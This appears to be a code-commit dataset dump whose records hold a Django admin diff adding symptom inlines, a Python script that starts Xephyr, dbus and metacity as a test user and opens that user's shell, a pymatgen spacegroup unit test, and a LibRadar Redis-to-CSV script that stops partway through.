admin.site.register(Patient)
admin.site.register(PatientRegister, PatientRegisterAdmin)
admin.site.register(Sample)
admin.site.register(CollectionType)
admin.site.register(Symptom)
|
<commit_before>from django.contrib import admin
from .models import Patient, PatientRegister, FluVaccine, Sample, CollectionType
class FluVaccineInline(admin.StackedInline):
model = FluVaccine
extra = 1
class SampleInline(admin.StackedInline):
model = Sample
extra = 1
class PatientRegisterAdmin(admin.ModelAdmin):
fieldsets = [
('Informações do Paciente', {'fields': ['patient']}),
('Dados institucionais', {'fields': ['id_gal_origin']}),
]
inlines = [
SampleInline,
FluVaccineInline,
]
admin.site.register(Patient)
admin.site.register(Sample)
admin.site.register(CollectionType)
admin.site.register(PatientRegister, PatientRegisterAdmin)
<commit_msg>:rocket: Add Symptoms and ObservedSymptoms to Admin<commit_after>from django.contrib import admin
from .models import (
Patient, PatientRegister,
FluVaccine,
Sample, CollectionType,
Symptom, ObservedSymptom
)
class FluVaccineInline(admin.StackedInline):
model = FluVaccine
extra = 1
class SampleInline(admin.StackedInline):
model = Sample
extra = 1
class ObservedSymptomInline(admin.StackedInline):
model = ObservedSymptom
extra = 2
class PatientRegisterAdmin(admin.ModelAdmin):
fieldsets = [
('Informações do Paciente', {'fields': ['patient']}),
('Dados institucionais', {'fields': ['id_gal_origin']}),
]
inlines = [
SampleInline,
FluVaccineInline,
ObservedSymptomInline,
]
admin.site.register(Patient)
admin.site.register(PatientRegister, PatientRegisterAdmin)
admin.site.register(Sample)
admin.site.register(CollectionType)
admin.site.register(Symptom)
|
9df2cddf573ad574a98b57164f0c186cf86dfcc4
|
spawn-test-env.py
|
spawn-test-env.py
|
#!/usr/bin/python -t
import sys, os
import gtk, gobject
import pwd
import types
def change_user(user):
try:
pwrec = pwd.getpwnam(user)
except KeyError:
raise Exception("Username '%s' does not exist." % user)
uid = pwrec[2]
os.setuid(uid)
return pwrec[6]
def shell_watch_cb(pid, condition, user_data=None):
print "In shell watch callback."
gtk.main_quit()
def main():
    if len(sys.argv) < 2:
        print "Usage: %s <test user>" % sys.argv[0]
        sys.exit(1)
user = sys.argv[1]
# Start Xephyr
DISPLAY = ":10"
args = "/usr/bin/Xephyr -ac -host-cursor -screen 800x600 %s" % DISPLAY
args = args.split()
(xephyr_pid, ign1, ign2, ign3) = gobject.spawn_async(args, flags=gobject.SPAWN_STDERR_TO_DEV_NULL | gobject.SPAWN_STDOUT_TO_DEV_NULL)
print "Xepyhr pid is %d" % xephyr_pid
shell = change_user(user)
args = "/bin/dbus-daemon --session --print-address".split()
(dbus_pid, ign1, dbus_stdout, ign3) = gobject.spawn_async(args, flags=gobject.SPAWN_STDERR_TO_DEV_NULL, standard_output=True)
dbus_file = os.fdopen(dbus_stdout)
addr = dbus_file.readline()
addr = addr.strip()
print "dbus-daemon pid is %d, session bus address is %s" % (dbus_pid, addr)
dbus_file.close()
os.environ["DISPLAY"] = DISPLAY
os.environ["DBUS_SESSION_BUS_ADDRESS"] = addr
args = "/usr/bin/metacity"
(metacity_pid, ign1, ign2, ign3) = gobject.spawn_async([args], flags=gobject.SPAWN_STDERR_TO_DEV_NULL | gobject.SPAWN_STDOUT_TO_DEV_NULL)
print "\n"
(shell_pid, ign1, ign2, ign3) = gobject.spawn_async([shell], flags=gobject.SPAWN_LEAVE_DESCRIPTORS_OPEN | gobject.SPAWN_CHILD_INHERITS_STDIN | gobject.SPAWN_DO_NOT_REAP_CHILD)
gobject.child_watch_add(shell_pid, shell_watch_cb)
try:
gtk.main()
except KeyboardInterrupt:
pass
try:
os.kill(dbus_pid, 9)
except OSError:
pass
try:
os.kill(metacity_pid, 9)
except OSError:
pass
if __name__ == "__main__":
main()
|
Add script that starts Xephyr, dbus, and metacity for a test user then dumps you to a shell
|
Add script that starts Xephyr, dbus, and metacity for a test user then dumps you to a shell
|
Python
|
lgpl-2.1
|
samdroid-apps/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit,sugarlabs/sugar-toolkit,tchx84/debian-pkg-sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit,tchx84/sugar-toolkit-gtk3,i5o/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit-gtk3,i5o/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit,tchx84/debian-pkg-sugar-toolkit-gtk3,quozl/sugar-toolkit-gtk3,quozl/sugar-toolkit-gtk3,godiard/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit,tchx84/debian-pkg-sugar-toolkit,samdroid-apps/sugar-toolkit-gtk3,gusDuarte/sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit,manuq/sugar-toolkit-gtk3,tchx84/sugar-toolkit-gtk3,i5o/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit-gtk3,i5o/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit-gtk3,puneetgkaur/backup_sugar_sugartoolkit,ceibal-tatu/sugar-toolkit-gtk3,puneetgkaur/backup_sugar_sugartoolkit,manuq/sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit-gtk3,Daksh/sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit-gtk3,gusDuarte/sugar-toolkit-gtk3,gusDuarte/sugar-toolkit-gtk3,gusDuarte/sugar-toolkit-gtk3,godiard/sugar-toolkit-gtk3,tchx84/debian-pkg-sugar-toolkit,samdroid-apps/sugar-toolkit-gtk3,Daksh/sugar-toolkit-gtk3,quozl/sugar-toolkit-gtk3,puneetgkaur/sugar-toolkit-gtk3,quozl/sugar-toolkit-gtk3,sugarlabs/sugar-toolkit-gtk3,Daksh/sugar-toolkit-gtk3,ceibal-tatu/sugar-toolkit,sugarlabs/sugar-toolkit,puneetgkaur/backup_sugar_sugartoolkit,tchx84/sugar-toolkit-gtk3,godiard/sugar-toolkit-gtk3,puneetgkaur/sugar-toolkit-gtk3,manuq/sugar-toolkit-gtk3,samdroid-apps/sugar-toolkit-gtk3,puneetgkaur/sugar-toolkit-gtk3
|
Add script that starts Xephyr, dbus, and metacity for a test user then dumps you to a shell
|
#!/usr/bin/python -t
import sys, os
import gtk, gobject
import pwd
import types
def change_user(user):
try:
pwrec = pwd.getpwnam(user)
except KeyError:
raise Exception("Username '%s' does not exist." % user)
uid = pwrec[2]
os.setuid(uid)
return pwrec[6]
def shell_watch_cb(pid, condition, user_data=None):
print "In shell watch callback."
gtk.main_quit()
def main():
    if len(sys.argv) < 2:
        print "Usage: %s <test user>" % sys.argv[0]
        sys.exit(1)
user = sys.argv[1]
# Start Xephyr
DISPLAY = ":10"
args = "/usr/bin/Xephyr -ac -host-cursor -screen 800x600 %s" % DISPLAY
args = args.split()
(xephyr_pid, ign1, ign2, ign3) = gobject.spawn_async(args, flags=gobject.SPAWN_STDERR_TO_DEV_NULL | gobject.SPAWN_STDOUT_TO_DEV_NULL)
print "Xepyhr pid is %d" % xephyr_pid
shell = change_user(user)
args = "/bin/dbus-daemon --session --print-address".split()
(dbus_pid, ign1, dbus_stdout, ign3) = gobject.spawn_async(args, flags=gobject.SPAWN_STDERR_TO_DEV_NULL, standard_output=True)
dbus_file = os.fdopen(dbus_stdout)
addr = dbus_file.readline()
addr = addr.strip()
print "dbus-daemon pid is %d, session bus address is %s" % (dbus_pid, addr)
dbus_file.close()
os.environ["DISPLAY"] = DISPLAY
os.environ["DBUS_SESSION_BUS_ADDRESS"] = addr
args = "/usr/bin/metacity"
(metacity_pid, ign1, ign2, ign3) = gobject.spawn_async([args], flags=gobject.SPAWN_STDERR_TO_DEV_NULL | gobject.SPAWN_STDOUT_TO_DEV_NULL)
print "\n"
(shell_pid, ign1, ign2, ign3) = gobject.spawn_async([shell], flags=gobject.SPAWN_LEAVE_DESCRIPTORS_OPEN | gobject.SPAWN_CHILD_INHERITS_STDIN | gobject.SPAWN_DO_NOT_REAP_CHILD)
gobject.child_watch_add(shell_pid, shell_watch_cb)
try:
gtk.main()
except KeyboardInterrupt:
pass
try:
os.kill(dbus_pid, 9)
except OSError:
pass
try:
os.kill(metacity_pid, 9)
except OSError:
pass
if __name__ == "__main__":
main()
|
<commit_before><commit_msg>Add script that starts Xephyr, dbus, and metacity for a test user then dumps you to a shell<commit_after>
|
#!/usr/bin/python -t
import sys, os
import gtk, gobject
import pwd
import types
def change_user(user):
try:
pwrec = pwd.getpwnam(user)
except KeyError:
raise Exception("Username '%s' does not exist." % user)
uid = pwrec[2]
os.setuid(uid)
return pwrec[6]
def shell_watch_cb(pid, condition, user_data=None):
print "In shell watch callback."
gtk.main_quit()
def main():
    if len(sys.argv) < 2:
        print "Usage: %s <test user>" % sys.argv[0]
        sys.exit(1)
user = sys.argv[1]
# Start Xephyr
DISPLAY = ":10"
args = "/usr/bin/Xephyr -ac -host-cursor -screen 800x600 %s" % DISPLAY
args = args.split()
(xephyr_pid, ign1, ign2, ign3) = gobject.spawn_async(args, flags=gobject.SPAWN_STDERR_TO_DEV_NULL | gobject.SPAWN_STDOUT_TO_DEV_NULL)
print "Xepyhr pid is %d" % xephyr_pid
shell = change_user(user)
args = "/bin/dbus-daemon --session --print-address".split()
(dbus_pid, ign1, dbus_stdout, ign3) = gobject.spawn_async(args, flags=gobject.SPAWN_STDERR_TO_DEV_NULL, standard_output=True)
dbus_file = os.fdopen(dbus_stdout)
addr = dbus_file.readline()
addr = addr.strip()
print "dbus-daemon pid is %d, session bus address is %s" % (dbus_pid, addr)
dbus_file.close()
os.environ["DISPLAY"] = DISPLAY
os.environ["DBUS_SESSION_BUS_ADDRESS"] = addr
args = "/usr/bin/metacity"
(metacity_pid, ign1, ign2, ign3) = gobject.spawn_async([args], flags=gobject.SPAWN_STDERR_TO_DEV_NULL | gobject.SPAWN_STDOUT_TO_DEV_NULL)
print "\n"
(shell_pid, ign1, ign2, ign3) = gobject.spawn_async([shell], flags=gobject.SPAWN_LEAVE_DESCRIPTORS_OPEN | gobject.SPAWN_CHILD_INHERITS_STDIN | gobject.SPAWN_DO_NOT_REAP_CHILD)
gobject.child_watch_add(shell_pid, shell_watch_cb)
try:
gtk.main()
except KeyboardInterrupt:
pass
try:
os.kill(dbus_pid, 9)
except OSError:
pass
try:
os.kill(metacity_pid, 9)
except OSError:
pass
if __name__ == "__main__":
main()
|
Add script that starts Xephyr, dbus, and metacity for a test user then dumps you to a shell#!/usr/bin/python -t
import sys, os
import gtk, gobject
import pwd
import types
def change_user(user):
try:
pwrec = pwd.getpwnam(user)
except KeyError:
raise Exception("Username '%s' does not exist." % user)
uid = pwrec[2]
os.setuid(uid)
return pwrec[6]
def shell_watch_cb(pid, condition, user_data=None):
print "In shell watch callback."
gtk.main_quit()
def main():
    if len(sys.argv) < 2:
        print "Usage: %s <test user>" % sys.argv[0]
        sys.exit(1)
user = sys.argv[1]
# Start Xephyr
DISPLAY = ":10"
args = "/usr/bin/Xephyr -ac -host-cursor -screen 800x600 %s" % DISPLAY
args = args.split()
(xephyr_pid, ign1, ign2, ign3) = gobject.spawn_async(args, flags=gobject.SPAWN_STDERR_TO_DEV_NULL | gobject.SPAWN_STDOUT_TO_DEV_NULL)
print "Xepyhr pid is %d" % xephyr_pid
shell = change_user(user)
args = "/bin/dbus-daemon --session --print-address".split()
(dbus_pid, ign1, dbus_stdout, ign3) = gobject.spawn_async(args, flags=gobject.SPAWN_STDERR_TO_DEV_NULL, standard_output=True)
dbus_file = os.fdopen(dbus_stdout)
addr = dbus_file.readline()
addr = addr.strip()
print "dbus-daemon pid is %d, session bus address is %s" % (dbus_pid, addr)
dbus_file.close()
os.environ["DISPLAY"] = DISPLAY
os.environ["DBUS_SESSION_BUS_ADDRESS"] = addr
args = "/usr/bin/metacity"
(metacity_pid, ign1, ign2, ign3) = gobject.spawn_async([args], flags=gobject.SPAWN_STDERR_TO_DEV_NULL | gobject.SPAWN_STDOUT_TO_DEV_NULL)
print "\n"
(shell_pid, ign1, ign2, ign3) = gobject.spawn_async([shell], flags=gobject.SPAWN_LEAVE_DESCRIPTORS_OPEN | gobject.SPAWN_CHILD_INHERITS_STDIN | gobject.SPAWN_DO_NOT_REAP_CHILD)
gobject.child_watch_add(shell_pid, shell_watch_cb)
try:
gtk.main()
except KeyboardInterrupt:
pass
try:
os.kill(dbus_pid, 9)
except OSError:
pass
try:
os.kill(metacity_pid, 9)
except OSError:
pass
if __name__ == "__main__":
main()
|
<commit_before><commit_msg>Add script that starts Xephyr, dbus, and metacity for a test user then dumps you to a shell<commit_after>#!/usr/bin/python -t
import sys, os
import gtk, gobject
import pwd
import types
def change_user(user):
try:
pwrec = pwd.getpwnam(user)
except KeyError:
raise Exception("Username '%s' does not exist." % user)
uid = pwrec[2]
os.setuid(uid)
return pwrec[6]
def shell_watch_cb(pid, condition, user_data=None):
print "In shell watch callback."
gtk.main_quit()
def main():
    if len(sys.argv) < 2:
        print "Usage: %s <test user>" % sys.argv[0]
        sys.exit(1)
user = sys.argv[1]
# Start Xephyr
DISPLAY = ":10"
args = "/usr/bin/Xephyr -ac -host-cursor -screen 800x600 %s" % DISPLAY
args = args.split()
(xephyr_pid, ign1, ign2, ign3) = gobject.spawn_async(args, flags=gobject.SPAWN_STDERR_TO_DEV_NULL | gobject.SPAWN_STDOUT_TO_DEV_NULL)
print "Xepyhr pid is %d" % xephyr_pid
shell = change_user(user)
args = "/bin/dbus-daemon --session --print-address".split()
(dbus_pid, ign1, dbus_stdout, ign3) = gobject.spawn_async(args, flags=gobject.SPAWN_STDERR_TO_DEV_NULL, standard_output=True)
dbus_file = os.fdopen(dbus_stdout)
addr = dbus_file.readline()
addr = addr.strip()
print "dbus-daemon pid is %d, session bus address is %s" % (dbus_pid, addr)
dbus_file.close()
os.environ["DISPLAY"] = DISPLAY
os.environ["DBUS_SESSION_BUS_ADDRESS"] = addr
args = "/usr/bin/metacity"
(metacity_pid, ign1, ign2, ign3) = gobject.spawn_async([args], flags=gobject.SPAWN_STDERR_TO_DEV_NULL | gobject.SPAWN_STDOUT_TO_DEV_NULL)
print "\n"
(shell_pid, ign1, ign2, ign3) = gobject.spawn_async([shell], flags=gobject.SPAWN_LEAVE_DESCRIPTORS_OPEN | gobject.SPAWN_CHILD_INHERITS_STDIN | gobject.SPAWN_DO_NOT_REAP_CHILD)
gobject.child_watch_add(shell_pid, shell_watch_cb)
try:
gtk.main()
except KeyboardInterrupt:
pass
try:
os.kill(dbus_pid, 9)
except OSError:
pass
try:
os.kill(metacity_pid, 9)
except OSError:
pass
if __name__ == "__main__":
main()
|
|
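A note on the magic indexes in change_user above: pwd records are tuples where index 2 is the uid and index 6 is the login shell. A quick standalone check in the same Python 2 style:
# pwrec[2] == pw_uid, pwrec[6] == pw_shell
import pwd
rec = pwd.getpwnam('root')
print rec[2], rec[6]   # same values as rec.pw_uid, rec.pw_shell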
5f925f837f4ae3ba136f0d6e271848b06467ea8b
|
pymatgen/symmetry/tests/test_spacegroup.py
|
pymatgen/symmetry/tests/test_spacegroup.py
|
#!/usr/bin/env python
'''
Created on Mar 12, 2012
'''
from __future__ import division
__author__="Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyue@mit.edu"
__date__ = "Mar 12, 2012"
import unittest
import os
from pymatgen.core.structure import PeriodicSite
from pymatgen.symmetry.spacegroup import Spacegroup
from pymatgen.io.vaspio import Poscar
from pymatgen.symmetry.spglib_adaptor import SymmetryFinder
import pymatgen
test_dir = os.path.join(os.path.dirname(os.path.abspath(pymatgen.__file__)), '..', 'test_files')
class SpacegroupTest(unittest.TestCase):
def setUp(self):
p = Poscar.from_file(os.path.join(test_dir, 'POSCAR'))
self.structure = p.struct
self.sg1 = SymmetryFinder(self.structure, 0.001).get_spacegroup()
self.sg2 = Spacegroup.from_spacegroup_number(62)
def test_are_symmetrically_equivalent(self):
sites1 = [self.structure[i] for i in [0,1]]
sites2 = [self.structure[i] for i in [2,3]]
self.assertTrue(self.sg1.are_symmetrically_equivalent(sites1, sites2, 1e-3))
self.assertTrue(self.sg2.are_symmetrically_equivalent(sites1, sites2, 1e-3))
sites1 = [self.structure[i] for i in [0,1]]
sites2 = [self.structure[i] for i in [0,2]]
self.assertFalse(self.sg1.are_symmetrically_equivalent(sites1, sites2, 1e-3))
self.assertFalse(self.sg2.are_symmetrically_equivalent(sites1, sites2, 1e-3))
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
Add a unittest for spacegroup. Still very basic.
|
Add a unittest for spacegroup. Still very basic.
|
Python
|
mit
|
yanikou19/pymatgen,yanikou19/pymatgen,sonium0/pymatgen,ctoher/pymatgen,rousseab/pymatgen,Bismarrck/pymatgen,migueldiascosta/pymatgen,rousseab/pymatgen,Bismarrck/pymatgen,migueldiascosta/pymatgen,rousseab/pymatgen,Bismarrck/pymatgen,sonium0/pymatgen,ctoher/pymatgen,ctoher/pymatgen,Dioptas/pymatgen,yanikou19/pymatgen,Bismarrck/pymatgen,sonium0/pymatgen,Bismarrck/pymatgen,Dioptas/pymatgen,migueldiascosta/pymatgen
|
Add a unittest for spacegroup. Still very basic.
|
#!/usr/bin/env python
'''
Created on Mar 12, 2012
'''
from __future__ import division
__author__="Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyue@mit.edu"
__date__ = "Mar 12, 2012"
import unittest
import os
from pymatgen.core.structure import PeriodicSite
from pymatgen.symmetry.spacegroup import Spacegroup
from pymatgen.io.vaspio import Poscar
from pymatgen.symmetry.spglib_adaptor import SymmetryFinder
import pymatgen
test_dir = os.path.join(os.path.dirname(os.path.abspath(pymatgen.__file__)), '..', 'test_files')
class SpacegroupTest(unittest.TestCase):
def setUp(self):
p = Poscar.from_file(os.path.join(test_dir, 'POSCAR'))
self.structure = p.struct
self.sg1 = SymmetryFinder(self.structure, 0.001).get_spacegroup()
self.sg2 = Spacegroup.from_spacegroup_number(62)
def test_are_symmetrically_equivalent(self):
sites1 = [self.structure[i] for i in [0,1]]
sites2 = [self.structure[i] for i in [2,3]]
self.assertTrue(self.sg1.are_symmetrically_equivalent(sites1, sites2, 1e-3))
self.assertTrue(self.sg2.are_symmetrically_equivalent(sites1, sites2, 1e-3))
sites1 = [self.structure[i] for i in [0,1]]
sites2 = [self.structure[i] for i in [0,2]]
self.assertFalse(self.sg1.are_symmetrically_equivalent(sites1, sites2, 1e-3))
self.assertFalse(self.sg2.are_symmetrically_equivalent(sites1, sites2, 1e-3))
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
<commit_before><commit_msg>Add a unittest for spacegroup. Still very basic.<commit_after>
|
#!/usr/bin/env python
'''
Created on Mar 12, 2012
'''
from __future__ import division
__author__="Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyue@mit.edu"
__date__ = "Mar 12, 2012"
import unittest
import os
from pymatgen.core.structure import PeriodicSite
from pymatgen.symmetry.spacegroup import Spacegroup
from pymatgen.io.vaspio import Poscar
from pymatgen.symmetry.spglib_adaptor import SymmetryFinder
import pymatgen
test_dir = os.path.join(os.path.dirname(os.path.abspath(pymatgen.__file__)), '..', 'test_files')
class SpacegroupTest(unittest.TestCase):
def setUp(self):
p = Poscar.from_file(os.path.join(test_dir, 'POSCAR'))
self.structure = p.struct
self.sg1 = SymmetryFinder(self.structure, 0.001).get_spacegroup()
self.sg2 = Spacegroup.from_spacegroup_number(62)
def test_are_symmetrically_equivalent(self):
sites1 = [self.structure[i] for i in [0,1]]
sites2 = [self.structure[i] for i in [2,3]]
self.assertTrue(self.sg1.are_symmetrically_equivalent(sites1, sites2, 1e-3))
self.assertTrue(self.sg2.are_symmetrically_equivalent(sites1, sites2, 1e-3))
sites1 = [self.structure[i] for i in [0,1]]
sites2 = [self.structure[i] for i in [0,2]]
self.assertFalse(self.sg1.are_symmetrically_equivalent(sites1, sites2, 1e-3))
self.assertFalse(self.sg2.are_symmetrically_equivalent(sites1, sites2, 1e-3))
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
Add a unittest for spacegroup. Still very basic.#!/usr/bin/env python
'''
Created on Mar 12, 2012
'''
from __future__ import division
__author__="Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyue@mit.edu"
__date__ = "Mar 12, 2012"
import unittest
import os
from pymatgen.core.structure import PeriodicSite
from pymatgen.symmetry.spacegroup import Spacegroup
from pymatgen.io.vaspio import Poscar
from pymatgen.symmetry.spglib_adaptor import SymmetryFinder
import pymatgen
test_dir = os.path.join(os.path.dirname(os.path.abspath(pymatgen.__file__)), '..', 'test_files')
class SpacegroupTest(unittest.TestCase):
def setUp(self):
p = Poscar.from_file(os.path.join(test_dir, 'POSCAR'))
self.structure = p.struct
self.sg1 = SymmetryFinder(self.structure, 0.001).get_spacegroup()
self.sg2 = Spacegroup.from_spacegroup_number(62)
def test_are_symmetrically_equivalent(self):
sites1 = [self.structure[i] for i in [0,1]]
sites2 = [self.structure[i] for i in [2,3]]
self.assertTrue(self.sg1.are_symmetrically_equivalent(sites1, sites2, 1e-3))
self.assertTrue(self.sg2.are_symmetrically_equivalent(sites1, sites2, 1e-3))
sites1 = [self.structure[i] for i in [0,1]]
sites2 = [self.structure[i] for i in [0,2]]
self.assertFalse(self.sg1.are_symmetrically_equivalent(sites1, sites2, 1e-3))
self.assertFalse(self.sg2.are_symmetrically_equivalent(sites1, sites2, 1e-3))
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
<commit_before><commit_msg>Add a unittest for spacegroup. Still very basic.<commit_after>#!/usr/bin/env python
'''
Created on Mar 12, 2012
'''
from __future__ import division
__author__="Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyue@mit.edu"
__date__ = "Mar 12, 2012"
import unittest
import os
from pymatgen.core.structure import PeriodicSite
from pymatgen.symmetry.spacegroup import Spacegroup
from pymatgen.io.vaspio import Poscar
from pymatgen.symmetry.spglib_adaptor import SymmetryFinder
import pymatgen
test_dir = os.path.join(os.path.dirname(os.path.abspath(pymatgen.__file__)), '..', 'test_files')
class SpacegroupTest(unittest.TestCase):
def setUp(self):
p = Poscar.from_file(os.path.join(test_dir, 'POSCAR'))
self.structure = p.struct
self.sg1 = SymmetryFinder(self.structure, 0.001).get_spacegroup()
self.sg2 = Spacegroup.from_spacegroup_number(62)
def test_are_symmetrically_equivalent(self):
sites1 = [self.structure[i] for i in [0,1]]
sites2 = [self.structure[i] for i in [2,3]]
self.assertTrue(self.sg1.are_symmetrically_equivalent(sites1, sites2, 1e-3))
self.assertTrue(self.sg2.are_symmetrically_equivalent(sites1, sites2, 1e-3))
sites1 = [self.structure[i] for i in [0,1]]
sites2 = [self.structure[i] for i in [0,2]]
self.assertFalse(self.sg1.are_symmetrically_equivalent(sites1, sites2, 1e-3))
self.assertFalse(self.sg2.are_symmetrically_equivalent(sites1, sites2, 1e-3))
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
|
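The spacegroup record above only checks are_symmetrically_equivalent pairwise. As an illustration, a minimal sketch of how the same call could partition a structure's sites into symmetry-equivalent classes; it assumes `structure` and a spacegroup object `sg` built exactly as in the test's setUp(), and is not part of the commit:

# Sketch: group sites into equivalence classes using only the API shown above.
def group_equivalent_sites(structure, sg, eps=1e-3):
    groups = []  # each entry is a list of mutually equivalent sites
    for site in structure:
        for group in groups:
            # are_symmetrically_equivalent compares two collections of sites
            if sg.are_symmetrically_equivalent([site], [group[0]], eps):
                group.append(site)
                break
        else:
            groups.append([site])
    return groups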
6128e69c9a9313887e66feb6b80e11fb21bf5f10
|
LibRadar/lite_dataset.py
|
LibRadar/lite_dataset.py
|
# -*- coding: utf-8 -*-
# Copyright 2017 Zachary Marv (马子昂)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from _settings import *
import redis
THRESHOLD = 10
db = redis.StrictRedis(host=DB_HOST,port=DB_PORT, db=2, password=DB_PSWD)
no_lib_packages = set()
with open("Data/IntermediateData/tag_rules.csv", "r") as rules:
for line in rules:
if line.startswith("Package"):
continue
pn, lib = line.split(',')[0],line.split(',')[1]
if lib == "no":
no_lib_packages.add(pn)
cursor = 0
dataset = open("Data/IntermediateData/lite_dataset_%d.csv" % THRESHOLD, "w")
for i in range(11123):
if i % 10 == 0:
print ("Progress:%d" % i)
res = db.hscan(name="feature_cnt", cursor=cursor, count=1000)
cursor = res[0]
for k in res[1]:
if int(res[1][k]) > THRESHOLD:
weight = db.hget(name="feature_weight", key=k)
un_ob_cnt = db.hget(name="un_ob_cnt", key=k)
if float(un_ob_cnt) / float(res[1][k]) < 0.2:
continue
un_ob_pn = db.hget(name="un_ob_pn", key=k)
if un_ob_pn in no_lib_packages:
continue
dataset.write("%s,%s,%s,%s,%s\n" %(k, res[1][k], weight, un_ob_cnt, un_ob_pn))
dataset.close()
|
Change Rules no,no,no to no,, & update some libs
|
Change Rules no,no,no to no,, & update some libs
|
Python
|
apache-2.0
|
pkumza/LibRadar,pkumza/LibRadar
|
Change Rules no,no,no to no,, & update some libs
|
# -*- coding: utf-8 -*-
# Copyright 2017 Zachary Marv (马子昂)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from _settings import *
import redis
THRESHOLD = 10
db = redis.StrictRedis(host=DB_HOST,port=DB_PORT, db=2, password=DB_PSWD)
no_lib_packages = set()
with open("Data/IntermediateData/tag_rules.csv", "r") as rules:
for line in rules:
if line.startswith("Package"):
continue
pn, lib = line.split(',')[0],line.split(',')[1]
if lib == "no":
no_lib_packages.add(pn)
cursor = 0
dataset = open("Data/IntermediateData/lite_dataset_%d.csv" % THRESHOLD, "w")
for i in range(11123):
if i % 10 == 0:
print ("Progress:%d" % i)
res = db.hscan(name="feature_cnt", cursor=cursor, count=1000)
cursor = res[0]
for k in res[1]:
if int(res[1][k]) > THRESHOLD:
weight = db.hget(name="feature_weight", key=k)
un_ob_cnt = db.hget(name="un_ob_cnt", key=k)
if float(un_ob_cnt) / float(res[1][k]) < 0.2:
continue
un_ob_pn = db.hget(name="un_ob_pn", key=k)
if un_ob_pn in no_lib_packages:
continue
dataset.write("%s,%s,%s,%s,%s\n" %(k, res[1][k], weight, un_ob_cnt, un_ob_pn))
dataset.close()
|
<commit_before><commit_msg>Change Rules no,no,no to no,, & update some libs<commit_after>
|
# -*- coding: utf-8 -*-
# Copyright 2017 Zachary Marv (马子昂)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from _settings import *
import redis
THRESHOLD = 10
db = redis.StrictRedis(host=DB_HOST,port=DB_PORT, db=2, password=DB_PSWD)
no_lib_packages = set()
with open("Data/IntermediateData/tag_rules.csv", "r") as rules:
for line in rules:
if line.startswith("Package"):
continue
pn, lib = line.split(',')[0],line.split(',')[1]
if lib == "no":
no_lib_packages.add(pn)
cursor = 0
dataset = open("Data/IntermediateData/lite_dataset_%d.csv" % THRESHOLD, "w")
for i in range(11123):
if i % 10 == 0:
print ("Progress:%d" % i)
res = db.hscan(name="feature_cnt", cursor=cursor, count=1000)
cursor = res[0]
for k in res[1]:
if int(res[1][k]) > THRESHOLD:
weight = db.hget(name="feature_weight", key=k)
un_ob_cnt = db.hget(name="un_ob_cnt", key=k)
if float(un_ob_cnt) / float(res[1][k]) < 0.2:
continue
un_ob_pn = db.hget(name="un_ob_pn", key=k)
if un_ob_pn in no_lib_packages:
continue
dataset.write("%s,%s,%s,%s,%s\n" %(k, res[1][k], weight, un_ob_cnt, un_ob_pn))
dataset.close()
|
Change Rules no,no,no to no,, & update some libs# -*- coding: utf-8 -*-
# Copyright 2017 Zachary Marv (马子昂)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from _settings import *
import redis
THRESHOLD = 10
db = redis.StrictRedis(host=DB_HOST,port=DB_PORT, db=2, password=DB_PSWD)
no_lib_packages = set()
with open("Data/IntermediateData/tag_rules.csv", "r") as rules:
for line in rules:
if line.startswith("Package"):
continue
pn, lib = line.split(',')[0],line.split(',')[1]
if lib == "no":
no_lib_packages.add(pn)
cursor = 0
dataset = open("Data/IntermediateData/lite_dataset_%d.csv" % THRESHOLD, "w")
for i in range(11123):
if i % 10 == 0:
